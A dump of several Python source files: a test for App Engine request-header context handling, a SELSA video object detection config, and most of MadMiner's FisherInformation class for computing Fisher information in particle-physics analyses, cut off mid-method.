orig_val = context.READ_FROM_OS_ENVIRON
def restore():
context.READ_FROM_OS_ENVIRON = orig_val
self.addCleanup(restore)
def testBooleanConversionOnWrite(self):
context.init_from_wsgi_environ({
'HTTP_X_APPENGINE_USER_IS_ADMIN': '1',
})
self.assertEqual(context.gae_headers.USER_IS_ADMIN.get(), True)
def testBooleanConversionOnRead(self):
context.READ_FROM_OS_ENVIRON = False
context.gae_headers.USER_IS_ADMIN.set(True)
self.assertEqual(context.get('USER_IS_ADMIN'), '1')
@mock.patch.dict(os.environ)
@mock.patch.object(context, 'READ_FROM_OS_ENVIRON')
def testReadFrom(self, mock_read_from_os_environ):
del mock_read_from_os_environ
context.gae_headers.USER_ID.set('value in context')
os.environ['USER_ID'] = 'value in os.environ'
with self.subTest('contextvars'):
context.READ_FROM_OS_ENVIRON = False
self.assertEqual(context.get('USER_ID'), 'value in context')
with self.subTest('os.environ'):
context.READ_FROM_OS_ENVIRON = True
self.assertEqual(context.get('USER_ID'), 'value in os.environ')
if __name__ == '__main__':
absltest.main()
|
the-stack_0_1561 | _base_ = [
'../../_base_/models/faster_rcnn_r50_dc5.py',
'../../_base_/datasets/imagenet_vid_fgfa_style.py',
'../../_base_/default_runtime.py'
]
model = dict(
type='SELSA',
detector=dict(
roi_head=dict(
type='SelsaRoIHead',
bbox_roi_extractor=dict(
type='TemporalRoIAlign',
num_most_similar_points=2,
num_temporal_attention_blocks=4,
roi_layer=dict(
type='RoIAlign', output_size=7, sampling_ratio=2),
out_channels=512,
featmap_strides=[16]),
bbox_head=dict(
type='SelsaBBoxHead',
num_shared_fcs=3,
aggregator=dict(
type='SelsaAggregator',
in_channels=1024,
num_attention_blocks=16)))))
# dataset settings
data = dict(
val=dict(
ref_img_sampler=dict(
_delete_=True,
num_ref_imgs=14,
frame_range=[-7, 7],
method='test_with_adaptive_stride')),
test=dict(
ref_img_sampler=dict(
_delete_=True,
num_ref_imgs=14,
frame_range=[-7, 7],
method='test_with_adaptive_stride')))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(
_delete_=True, grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[2, 5])
# runtime settings
total_epochs = 7
evaluation = dict(metric=['bbox'], interval=7)
|
the-stack_0_1562 | from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import numpy as np
import os
from madminer.analysis import DataAnalyzer
from madminer.utils.various import math_commands, weighted_quantile, sanitize_array, mdot
from madminer.utils.various import less_logging
from madminer.ml import ParameterizedRatioEstimator, ScoreEstimator, Ensemble, load_estimator
logger = logging.getLogger(__name__)
class FisherInformation(DataAnalyzer):
"""
Functions to calculate expected Fisher information matrices.
After inializing a `FisherInformation` instance with the filename of a MadMiner file, different information matrices
can be calculated:
* `FisherInformation.truth_information()` calculates the full truth-level Fisher information.
This is the information in an idealized measurement where all parton-level particles with their charges, flavours,
and four-momenta can be accessed with perfect accuracy.
* `FisherInformation.full_information()` calculates the full Fisher information in
realistic detector-level observations, estimated with neural networks. In addition to the MadMiner file, this
requires a trained SALLY or SALLINO estimator as well as an unweighted evaluation sample.
* `FisherInformation.rate_information()` calculates the Fisher information in the total cross
section.
* `FisherInformation.histo_information()` calculates the Fisher information in the histogram of
one (parton-level or detector-level) observable.
* `FisherInformation.histo_information_2d()` calculates the Fisher information in a two-dimensional
histogram of two (parton-level or detector-level) observables.
* `FisherInformation.histogram_of_information()` calculates the full truth-level Fisher information in
different slices of one observable (the "distribution of the Fisher information").
Finally, don't forget that in the presence of nuisance parameters the constraint terms also affect the Fisher
information. This term is given by `FisherInformation.calculate_fisher_information_nuisance_constraints()`.
Parameters
----------
filename : str
Path to MadMiner file (for instance the output of `madminer.delphes.DelphesProcessor.save()`).
include_nuisance_parameters : bool, optional
If True, nuisance parameters are taken into account. Default value: True.
"""
def __init__(self, filename, include_nuisance_parameters=True):
super(FisherInformation, self).__init__(filename, False, include_nuisance_parameters)
def truth_information(
self, theta, luminosity=300000.0, cuts=None, efficiency_functions=None, include_nuisance_parameters=True
):
"""
Calculates the full Fisher information at parton / truth level. This is the information in an idealized
measurement where all parton-level particles with their charges, flavours, and four-momenta can be accessed with
perfect accuracy, i.e. the latent variables `z_parton` can be measured directly.
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
luminosity : float
Luminosity in pb^-1.
cuts : None or list of str, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
include_nuisance_parameters : bool, optional
If True, nuisance parameters are taken into account. Default value: True.
Returns
-------
fisher_information : ndarray
Expected full truth-level Fisher information matrix with shape `(n_parameters, n_parameters)`.
fisher_information_uncertainty : ndarray
Covariance matrix of the Fisher information matrix with shape
`(n_parameters, n_parameters, n_parameters, n_parameters)`, calculated with plain Gaussian error
propagation.
"""
# Input
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
include_nuisance_parameters = include_nuisance_parameters and (self.nuisance_parameters is not None)
# Loop over batches
n_all_parameters = self.n_parameters
if include_nuisance_parameters:
n_all_parameters += self.n_nuisance_parameters
fisher_info = np.zeros((n_all_parameters, n_all_parameters))
covariance = np.zeros((n_all_parameters, n_all_parameters, n_all_parameters, n_all_parameters))
for observations, weights in self.event_loader():
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights = weights[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights *= efficiencies[:, np.newaxis]
# Fisher information
this_fisher_info, this_covariance = self._calculate_fisher_information(
theta,
weights,
luminosity,
sum_events=True,
calculate_uncertainty=True,
include_nuisance_parameters=include_nuisance_parameters,
)
fisher_info += this_fisher_info
covariance += this_covariance
return fisher_info, covariance
def full_information(
self,
theta,
model_file,
unweighted_x_sample_file=None,
luminosity=300000.0,
include_xsec_info=True,
mode="score",
calculate_covariance=True,
batch_size=100000,
test_split=0.2,
):
"""
Calculates the full Fisher information in realistic detector-level observations, estimated with neural networks.
In addition to the MadMiner file, this requires a trained SALLY or SALLINO estimator.
Nuisance parameter are taken into account automatically if the SALLY / SALLINO model was trained with them.
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
model_file : str
Filename of a trained local score regression model that was trained on samples from `theta` (see
`madminer.ml.Estimator`).
unweighted_x_sample_file : str or None
Filename of an unweighted x sample that is sampled according to theta and obeys the cuts
(see `madminer.sampling.SampleAugmenter.extract_samples_train_local()`). If None, the Fisher information
is instead calculated on the full, weighted samples (the data in the MadMiner file). Default value: None.
luminosity : float, optional
Luminosity in pb^-1. Default value: 300000.
include_xsec_info : bool, optional
Whether the rate information is included in the returned Fisher information. Default value: True.
mode : {"score", "information"}, optional
How the ensemble uncertainty on the kinematic Fisher information is calculated. If mode is "information",
the Fisher information for each estimator is calculated individually and only then
are the sample mean and covariance calculated. If mode is "score", the sample mean is
calculated for the score for each event. Default value: "score".
calculate_covariance : bool, optional
If True, the covariance between the different estimators is calculated. Default value: True.
batch_size : int, optional
Batch size. Default value: 100000.
test_split : float or None, optional
If unweighted_x_sample_file is None, this determines the fraction of weighted events used for evaluation.
If None, all events are used (this will probably include events used during training!). Default value: 0.2.
Returns
-------
fisher_information : ndarray or list of ndarray
Estimated expected full detector-level Fisher information matrix with shape `(n_parameters, n_parameters)`.
If more then one value ensemble_vote_expectation_weight is given, this is a list with results for all
entries in ensemble_vote_expectation_weight.
fisher_information_uncertainty : ndarray or list of ndarray or None
Covariance matrix of the Fisher information matrix with shape
`(n_parameters, n_parameters, n_parameters, n_parameters)`. If more then one value
ensemble_vote_expectation_weight is given, this is a list with results for all entries in
ensemble_vote_expectation_weight.
"""
# Check input
if mode not in ["score", "information", "modified_score"]:
raise ValueError("Unknown mode {}, has to be 'score', 'modified_score', or 'information'!".format(mode))
# Load Estimator model
if os.path.isdir(model_file) and os.path.exists(model_file + "/ensemble.json"):
model_is_ensemble = True
model = Ensemble()
model.load(model_file)
if isinstance(model.estimators[0], ParameterizedRatioEstimator):
model_type = "Parameterized Ratio Ensemble"
elif isinstance(model.estimators[0], ScoreEstimator):
model_type = "Score Ensemble"
else:
raise RuntimeError("Ensemble is not a score or parameterized_ratio type!")
else:
model_is_ensemble = False
model = load_estimator(model_file)
if isinstance(model, ParameterizedRatioEstimator):
model_type = "Parameterized Ratio Estimator"
elif isinstance(model, ScoreEstimator):
model_type = "Score Estimator"
else:
raise RuntimeError("Estimator is not a score or parameterized_ratio type!")
# Nuisance parameters?
if model.n_parameters == self.n_parameters:
logger.info(
"Found %s parameters in %s model, matching %s physical parameters in MadMiner file",
model.n_parameters,
model_type,
self.n_parameters,
)
include_nuisance_parameters = False
elif model.n_parameters == self.n_parameters + self.n_nuisance_parameters:
logger.info(
"Found %s parameters in %s model, matching %s physical parameters + %s nuisance parameters"
+ " in MadMiner file",
model.n_parameters,
model_type,
self.n_parameters,
self.n_nuisance_parameters,
)
include_nuisance_parameters = True
else:
raise RuntimeError(
"Inconsistent numbers of parameters! Found %s in %s model, %s physical parameters in "
"MadMiner file, and %s nuisance parameters in MadMiner file.",
model.n_parameters,
model_type,
self.n_parameters,
self.n_nuisance_parameters,
)
if include_nuisance_parameters:
logger.debug("Including nuisance parameters")
else:
logger.debug("Not including nuisance parameters")
# Total xsec
total_xsec = self._calculate_xsec(theta=theta)
logger.debug("Total cross section: %s pb", total_xsec)
# Rate part of Fisher information
fisher_info_rate = 0.0
rate_covariance = 0.0
if include_xsec_info:
logger.info("Evaluating rate Fisher information")
fisher_info_rate, rate_covariance = self.rate_information(
theta=theta, luminosity=luminosity, include_nuisance_parameters=include_nuisance_parameters
)
# Evaluation from weighted events
if unweighted_x_sample_file is None:
# Which events to sum over
if test_split is None or test_split <= 0.0 or test_split >= 1.0:
start_event = 0
else:
start_event = int(round((1.0 - test_split) * self.n_samples, 0)) + 1
if start_event > 0:
total_sum_weights_theta = self._calculate_xsec(theta=theta, start_event=start_event)
else:
total_sum_weights_theta = total_xsec
# Theta morphing matrix
theta_matrix = self._get_theta_benchmark_matrix(theta)
# Prepare output
fisher_info_kin = None
covariance = None
# Number of batches
n_batches = int(np.ceil((self.n_samples - start_event) / batch_size))
n_batches_verbose = max(int(round(n_batches / 10, 0)), 1)
for i_batch, (observations, weights_benchmarks) in enumerate(
self.event_loader(
batch_size=batch_size, start=start_event, include_nuisance_parameters=include_nuisance_parameters
)
):
if (i_batch + 1) % n_batches_verbose == 0:
logger.info("Evaluating kinematic Fisher information on batch %s / %s", i_batch + 1, n_batches)
else:
logger.debug("Evaluating kinematic Fisher information on batch %s / %s", i_batch + 1, n_batches)
weights_theta = mdot(theta_matrix, weights_benchmarks)
# Calculate Fisher info on this batch
if model_is_ensemble:
with less_logging():
this_fisher_info, this_covariance = model.calculate_fisher_information(
x=observations,
theta=theta,
obs_weights=weights_theta,
n_events=luminosity * total_xsec * np.sum(weights_theta) / total_sum_weights_theta,
calculate_covariance=calculate_covariance,
mode=mode,
)
else:
with less_logging():
this_fisher_info = model.calculate_fisher_information(
x=observations,
theta=theta,
weights=weights_theta,
n_events=luminosity * total_xsec * np.sum(weights_theta) / total_sum_weights_theta,
)
this_covariance = None
# Sum up results
if fisher_info_kin is None:
fisher_info_kin = this_fisher_info
elif isinstance(fisher_info_kin, list):
for i in range(len(fisher_info_kin)):
fisher_info_kin[i] += this_fisher_info[i]
else:
fisher_info_kin += this_fisher_info
if this_covariance is not None:
if covariance is None:
covariance = this_covariance
elif isinstance(covariance, list):
for i in range(len(covariance)):
covariance[i] += this_covariance[i]
else:
covariance += this_covariance
# Evaluation from unweighted event sample
else:
with less_logging():
if model_is_ensemble:
fisher_info_kin, covariance = model.calculate_fisher_information(
x=unweighted_x_sample_file,
theta=theta,
n_events=luminosity * total_xsec,
mode=mode,
calculate_covariance=calculate_covariance,
)
else:
fisher_info_kin = model.calculate_fisher_information(
x=unweighted_x_sample_file, n_events=luminosity * total_xsec, theta=theta
)
covariance = None
# Returns
if model_is_ensemble:
return fisher_info_rate + fisher_info_kin, rate_covariance + covariance
return fisher_info_rate + fisher_info_kin, rate_covariance
def rate_information(
self, theta, luminosity, cuts=None, efficiency_functions=None, include_nuisance_parameters=True
):
"""
Calculates the Fisher information in a measurement of the total cross section (without any kinematic
information).
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
luminosity : float
Luminosity in pb^-1.
cuts : None or list of str, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
include_nuisance_parameters : bool, optional
If True, nuisance parameters are taken into account. Default value: True.
Returns
-------
fisher_information : ndarray
Expected Fisher information in the total cross section with shape `(n_parameters, n_parameters)`.
fisher_information_uncertainty : ndarray
Covariance matrix of the Fisher information matrix with shape
`(n_parameters, n_parameters, n_parameters, n_parameters)`, calculated with plain Gaussian error
propagation.
"""
include_nuisance_parameters = include_nuisance_parameters and (self.nuisance_parameters is not None)
# Get weights at benchmarks
weights_benchmarks, weights_benchmark_uncertainties = self._calculate_xsec(
cuts=cuts,
efficiency_functions=efficiency_functions,
return_benchmark_xsecs=True,
return_error=True,
include_nuisance_parameters=include_nuisance_parameters,
)
weights_benchmarks = weights_benchmarks.reshape((1, -1))
weights_benchmark_uncertainties = weights_benchmark_uncertainties.reshape((1, -1))
# Get Fisher information
fisher_info, covariance = self._calculate_fisher_information(
theta=theta,
weights_benchmarks=weights_benchmarks,
luminosity=luminosity,
sum_events=True,
calculate_uncertainty=True,
weights_benchmark_uncertainties=weights_benchmark_uncertainties,
include_nuisance_parameters=include_nuisance_parameters,
)
return fisher_info, covariance
def histo_information(
self,
theta,
luminosity,
observable,
bins,
histrange=None,
cuts=None,
efficiency_functions=None,
n_events_dynamic_binning=None,
):
"""
Calculates the Fisher information in the one-dimensional histogram of an (parton-level or detector-level,
depending on how the observations in the MadMiner file were calculated) observable.
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
luminosity : float
Luminosity in pb^-1.
observable : str
Expression for the observable to be histogrammed. The str will be parsed by Python's `eval()` function
and can use the names of the observables in the MadMiner files.
bins : int or ndarray
If int: number of bins in the histogram, excluding overflow bins. Otherwise, defines the bin boundaries
(excluding overflow bins).
histrange : tuple of float or None, optional
Minimum and maximum value of the histogram in the form `(min, max)`. Overflow bins are always added. If
None and bins is an int, variable-width bins with equal cross section are constructed automatically.
Default value: None.
cuts : None or list of str, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
n_events_dynamic_binning : int or None, optional
Number of events used to calculate the dynamic binning (if histrange is None). If None, all events are used.
Note that these events are not shuffled, so if the events in the MadMiner file are sorted, using a value
different from None can cause issues. Default value: None.
Returns
-------
fisher_information : ndarray
Expected Fisher information in the histogram with shape `(n_parameters, n_parameters)`.
fisher_information_uncertainty : ndarray
Covariance matrix of the Fisher information matrix with shape
`(n_parameters, n_parameters, n_parameters, n_parameters)`, calculated with plain Gaussian error
propagation.
"""
# Input
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
# Binning
bin_boundaries, n_bins_total = self._calculate_binning(
bins, cuts, efficiency_functions, histrange, n_events_dynamic_binning, observable, theta
)
# Loop over batches
weights_benchmarks = np.zeros((n_bins_total, self.n_benchmarks))
weights_squared_benchmarks = np.zeros((n_bins_total, self.n_benchmarks))
for observations, weights in self.event_loader():
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights = weights[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights *= efficiencies[:, np.newaxis]
# Evaluate histogrammed observable
histo_observables = np.asarray([self._eval_observable(obs_event, observable) for obs_event in observations])
# Find bins
i_bins = np.searchsorted(bin_boundaries, histo_observables)
assert ((0 <= i_bins) & (i_bins < n_bins_total)).all(), "Wrong bin {}".format(i_bins)
# Add up
for i in range(n_bins_total):
if len(weights[i_bins == i]) > 0:
weights_benchmarks[i] += np.sum(weights[i_bins == i], axis=0)
weights_squared_benchmarks[i] += np.sum(weights[i_bins == i] ** 2, axis=0)
weights_benchmark_uncertainties = weights_squared_benchmarks ** 0.5
# Check cross sections per bin
self._check_binning_stats(weights_benchmarks, weights_benchmark_uncertainties, theta)
# Calculate Fisher information in histogram
fisher_info, covariance = self._calculate_fisher_information(
theta,
weights_benchmarks,
luminosity,
sum_events=True,
weights_benchmark_uncertainties=weights_benchmark_uncertainties,
calculate_uncertainty=True,
)
return fisher_info, covariance
def histo_information_2d(
self,
theta,
luminosity,
observable1,
bins1,
observable2,
bins2,
histrange1=None,
histrange2=None,
cuts=None,
efficiency_functions=None,
n_events_dynamic_binning=None,
):
"""
Calculates the Fisher information in a two-dimensional histogram of two (parton-level or detector-level,
depending on how the observations in the MadMiner file were calculated) observables.
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
luminosity : float
Luminosity in pb^-1.
observable1 : str
Expression for the first observable to be histogrammed. The str will be parsed by Python's `eval()` function
and can use the names of the observables in the MadMiner files.
bins1 : int or ndarray
If int: number of bins along the first axis in the histogram in the histogram, excluding overflow bins.
Otherwise, defines the bin boundaries along the first axis in the histogram (excluding overflow bins).
observable2 : str
Expression for the first observable to be histogrammed. The str will be parsed by Python's `eval()` function
and can use the names of the observables in the MadMiner files.
bins2 : int or ndarray
If int: number of bins along the second axis in the histogram in the histogram, excluding overflow bins.
Otherwise, defines the bin boundaries along the second axis in the histogram (excluding overflow bins).
histrange1 : tuple of float or None, optional
Minimum and maximum value of the first axis of the histogram in the form `(min, max)`. Overflow bins are
always added. If None, variable-width bins with equal cross section are constructed automatically. Default
value: None.
histrange2 : tuple of float or None, optional
Minimum and maximum value of the first axis of the histogram in the form `(min, max)`. Overflow bins are
always added. If None, variable-width bins with equal cross section are constructed automatically. Default
value: None.
cuts : None or list of str, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
n_events_dynamic_binning : int or None, optional
Number of events used to calculate the dynamic binning (if histrange is None). If None, all events are used.
Note that these events are not shuffled, so if the events in the MadMiner file are sorted, using a value
different from None can cause issues. Default value: None.
Returns
-------
fisher_information : ndarray
Expected Fisher information in the histogram with shape `(n_parameters, n_parameters)`.
fisher_information_uncertainty : ndarray
Covariance matrix of the Fisher information matrix with shape
`(n_parameters, n_parameters, n_parameters, n_parameters)`, calculated with plain Gaussian error
propagation.
"""
# Input
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
# Binning
bin1_boundaries, n_bins1_total = self._calculate_binning(
bins1, cuts, efficiency_functions, histrange1, n_events_dynamic_binning, observable1, theta
)
bin2_boundaries, n_bins2_total = self._calculate_binning(
bins2, cuts, efficiency_functions, histrange2, n_events_dynamic_binning, observable2, theta
)
# Loop over batches
weights_benchmarks = np.zeros((n_bins1_total, n_bins2_total, self.n_benchmarks))
weights_squared_benchmarks = np.zeros((n_bins1_total, n_bins2_total, self.n_benchmarks))
for observations, weights in self.event_loader():
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights = weights[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights *= efficiencies[:, np.newaxis]
# Evaluate histogrammed observable
histo1_observables = np.asarray(
[self._eval_observable(obs_event, observable1) for obs_event in observations]
)
histo2_observables = np.asarray(
[self._eval_observable(obs_event, observable2) for obs_event in observations]
)
# Find bins
i_bins1 = np.searchsorted(bin1_boundaries, histo1_observables)
i_bins2 = np.searchsorted(bin2_boundaries, histo2_observables)
assert ((0 <= i_bins1) & (i_bins1 < n_bins1_total)).all(), "Wrong bin {}".format(i_bins1)
assert ((0 <= i_bins2) & (i_bins2 < n_bins1_total)).all(), "Wrong bin {}".format(i_bins2)
# Add up
for i in range(n_bins1_total):
for j in range(n_bins2_total):
if len(weights[(i_bins1 == i) & (i_bins2 == j)]) > 0:
weights_benchmarks[i, j] += np.sum(weights[(i_bins1 == i) & (i_bins2 == j)], axis=0)
weights_squared_benchmarks[i, j] += np.sum(
weights[(i_bins1 == i) & (i_bins2 == j)] ** 2, axis=0
)
weights_benchmark_uncertainties = weights_squared_benchmarks ** 0.5
# Calculate Fisher information in histogram
weights_benchmarks = weights_benchmarks.reshape(-1, self.n_benchmarks)
weights_benchmark_uncertainties = weights_benchmark_uncertainties.reshape(-1, self.n_benchmarks)
self._check_binning_stats(
weights_benchmarks, weights_benchmark_uncertainties, theta, n_bins_last_axis=n_bins2_total
)
fisher_info, covariance = self._calculate_fisher_information(
theta,
weights_benchmarks,
luminosity,
sum_events=True,
weights_benchmark_uncertainties=weights_benchmark_uncertainties,
calculate_uncertainty=True,
)
return fisher_info, covariance
def histogram_of_information(
self,
theta,
observable,
nbins,
histrange,
model_file=None,
luminosity=300000.0,
cuts=None,
efficiency_functions=None,
batch_size=100000,
test_split=0.2,
):
"""
Calculates the full and rate-only Fisher information in slices of one observable. For the full
information, it will return the truth-level information if model_file is None, and otherwise the
detector-level information based on the SALLY-type score estimator saved in model_file.
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
observable : str
Expression for the observable to be sliced. The str will be parsed by Python's `eval()` function
and can use the names of the observables in the MadMiner files.
nbins : int
Number of bins in the slicing, excluding overflow bins.
histrange : tuple of float
Minimum and maximum value of the slicing in the form `(min, max)`. Overflow bins are always added.
model_file : str or None, optional
If None, the truth-level Fisher information is calculated. If str, filename of a trained local score
regression model that was trained on samples from `theta` (see `madminer.ml.Estimator`). Default value:
None.
luminosity : float, optional
Luminosity in pb^-1. Default value: 300000.
cuts : None or list of str, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
batch_size : int, optional
If model_file is not None: Batch size. Default value: 100000.
test_split : float or None, optional
If model_file is not None: If unweighted_x_sample_file is None, this determines the fraction of weighted
events used for evaluation.
If None, all events are used (this will probably include events used during training!). Default value: 0.2.
Returns
-------
bin_boundaries : ndarray
Observable slice boundaries.
sigma_bins : ndarray
Cross section in pb in each of the slices.
fisher_infos_rate : ndarray
Expected rate-only Fisher information for each slice. Has shape `(n_slices, n_parameters, n_parameters)`.
fisher_infos_full : ndarray
Expected full Fisher information for each slice. Has shape
`(n_slices, n_parameters, n_parameters)`.
"""
# Input
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
# Theta morphing matrix
theta_matrix = self._get_theta_benchmark_matrix(theta)
# Number of bins
n_bins_total = nbins + 2
bin_boundaries = np.linspace(histrange[0], histrange[1], num=nbins + 1)
# Prepare output
weights_benchmarks_bins = np.zeros((n_bins_total, self.n_benchmarks))
fisher_info_full_bins = np.zeros((n_bins_total, self.n_parameters, self.n_parameters))
# Main loop: truth-level case
if model_file is None:
for observations, weights in self.event_loader():
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights = weights[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights *= efficiencies[:, np.newaxis]
# Fisher info per event
fisher_info_events = self._calculate_fisher_information(theta, weights, luminosity, sum_events=False)
# Evaluate histogrammed observable
histo_observables = np.asarray(
[self._eval_observable(obs_event, observable) for obs_event in observations]
)
# Get rid of nuisance parameters
fisher_info_events = fisher_info_events[:, : self.n_parameters, : self.n_parameters]
# Find bins
bins = np.searchsorted(bin_boundaries, histo_observables)
assert ((0 <= bins) & (bins < n_bins_total)).all(), "Wrong bin {}".format(bins)
# Add up
for i in range(n_bins_total):
if len(weights[bins == i]) > 0:
weights_benchmarks_bins[i] += np.sum(weights[bins == i], axis=0)
fisher_info_full_bins[i] += np.sum(fisher_info_events[bins == i], axis=0)
# ML case
else:
# Load SALLY model
if os.path.isdir(model_file) and os.path.exists(model_file + "/ensemble.json"):
model_is_ensemble = True
model = Ensemble()
model.load(model_file)
else:
model_is_ensemble = False
model = ScoreEstimator()
model.load(model_file)
# Nuisance parameters?
if model.n_parameters == self.n_parameters:
logger.debug(
"Found %s parameters in SALLY model, matching %s physical parameters in MadMiner file",
model.n_parameters,
self.n_parameters,
)
include_nuisance_parameters = False
elif model.n_parameters == self.n_parameters + self.n_nuisance_parameters:
logger.debug(
"Found %s parameters in SALLY model, matching %s physical parameters + %s nuisance parameters"
+ " in MadMiner file",
model.n_parameters,
self.n_parameters,
self.n_nuisance_parameters,
)
include_nuisance_parameters = True
else:
raise RuntimeError(
"Inconsistent numbers of parameters! Found %s in SALLY model, %s physical parameters in "
"MadMiner file, and %s nuisance parameters in MadMiner file.",
model.n_parameters,
self.n_parameters,
self.n_nuisance_parameters,
)
# Total xsec
total_xsec = self._calculate_xsec(theta=theta)
logger.debug("Total cross section: %s pb", total_xsec)
# Which events to sum over
if test_split is None or test_split <= 0.0 or test_split >= 1.0:
start_event = 0
else:
start_event = int(round((1.0 - test_split) * self.n_samples, 0)) + 1
if start_event > 0:
total_sum_weights_theta = self._calculate_xsec(theta=theta, start_event=start_event)
else:
total_sum_weights_theta = total_xsec
# Number of batches
n_batches = int(np.ceil((self.n_samples - start_event) / batch_size))
n_batches_verbose = max(int(round(n_batches / 10, 0)), 1)
# ML main loop
for i_batch, (observations, weights_benchmarks) in enumerate(
self.event_loader(
batch_size=batch_size, start=start_event, include_nuisance_parameters=include_nuisance_parameters
)
):
if (i_batch + 1) % n_batches_verbose == 0:
logger.info("Evaluating kinematic Fisher information on batch %s / %s", i_batch + 1, n_batches)
else:
logger.debug("Evaluating kinematic Fisher information on batch %s / %s", i_batch + 1, n_batches)
# Cuts
cut_filter = [self._pass_cuts(obs_event, cuts) for obs_event in observations]
observations = observations[cut_filter]
weights_benchmarks = weights_benchmarks[cut_filter]
# Efficiencies
efficiencies = np.array(
[self._eval_efficiency(obs_event, efficiency_functions) for obs_event in observations]
)
weights_benchmarks *= efficiencies[:, np.newaxis]
# Rescale for test_split
if test_split is not None:
correction = np.array([1.0 / test_split for obs_event in observations])
weights_benchmarks *= correction[:, np.newaxis]
weights_theta = mdot(theta_matrix, weights_benchmarks)
# Calculate Fisher info on this batch
if model_is_ensemble:
fisher_info_events, _ = model.calculate_fisher_information(
x=observations,
obs_weights=weights_theta,
n_events=luminosity * np.sum(weights_theta),
mode="score",
calculate_covariance=False,
sum_events=False,
)
else:
fisher_info_events = model.calculate_fisher_information(
x=observations,
weights=weights_theta,
n_events=luminosity * np.sum(weights_theta),
sum_events=False,
)
# Get rid of nuisance parameters
if include_nuisance_parameters:
fisher_info_events = fisher_info_events[:, : self.n_parameters, : self.n_parameters]
# Evaluate histogrammed observable
histo_observables = np.asarray(
[self._eval_observable(obs_event, observable) for obs_event in observations]
)
# Find bins
bins = np.searchsorted(bin_boundaries, histo_observables)
assert ((0 <= bins) & (bins < n_bins_total)).all(), "Wrong bin {}".format(bins)
# Add up
for i in range(n_bins_total):
if len(weights_benchmarks[bins == i]) > 0:
weights_benchmarks_bins[i] += np.sum(weights_benchmarks[bins == i], axis=0)
fisher_info_full_bins[i] += np.sum(fisher_info_events[bins == i], axis=0)
# Calculate xsecs in bins
sigma_bins = mdot(theta_matrix, weights_benchmarks_bins) # (n_bins,)
# Calculate rate-only Fisher informations in bins
fisher_info_rate_bins = self._calculate_fisher_information(
theta, weights_benchmarks_bins, luminosity, sum_events=False
)
# Get rid of nuisance parameters
fisher_info_rate_bins = fisher_info_rate_bins[:, : self.n_parameters, : self.n_parameters]
# If ML: xsec info is still missing !
if model_file is not None:
fisher_info_full_bins += fisher_info_rate_bins
return bin_boundaries, sigma_bins, fisher_info_rate_bins, fisher_info_full_bins
def histogram_of_sigma_dsigma(self, theta, observable, nbins, histrange, cuts=None, efficiency_functions=None):
"""
Fills events into histograms and calculates the cross section and first derivative for each bin
Parameters
----------
theta : ndarray
Parameter point `theta` at which the Fisher information matrix `I_ij(theta)` is evaluated.
observable : str
Expression for the observable to be sliced. The str will be parsed by Python's `eval()` function
and can use the names of the observables in the MadMiner files.
nbins : int
Number of bins in the slicing, excluding overflow bins.
histrange : tuple of float
Minimum and maximum value of the slicing in the form `(min, max)`. Overflow bins are always added.
cuts : None or list of str, optional
Cuts. Each entry is a parseable Python expression that returns a bool (True if the event should pass a cut,
False otherwise). Default value: None.
efficiency_functions : list of str or None
Efficiencies. Each entry is a parseable Python expression that returns a float for the efficiency of one
component. Default value: None.
Returns
-------
bin_boundaries : ndarray
Observable slice boundaries.
sigma_bins : ndarray
Cross section in pb in each of the slices.
dsigma_bins : ndarray
Cross section in pb in each of the slices.
"""
# Input
if cuts is None:
cuts = []
if efficiency_functions is None:
efficiency_functions = []
# Binning
dynamic_binning = histrange is None
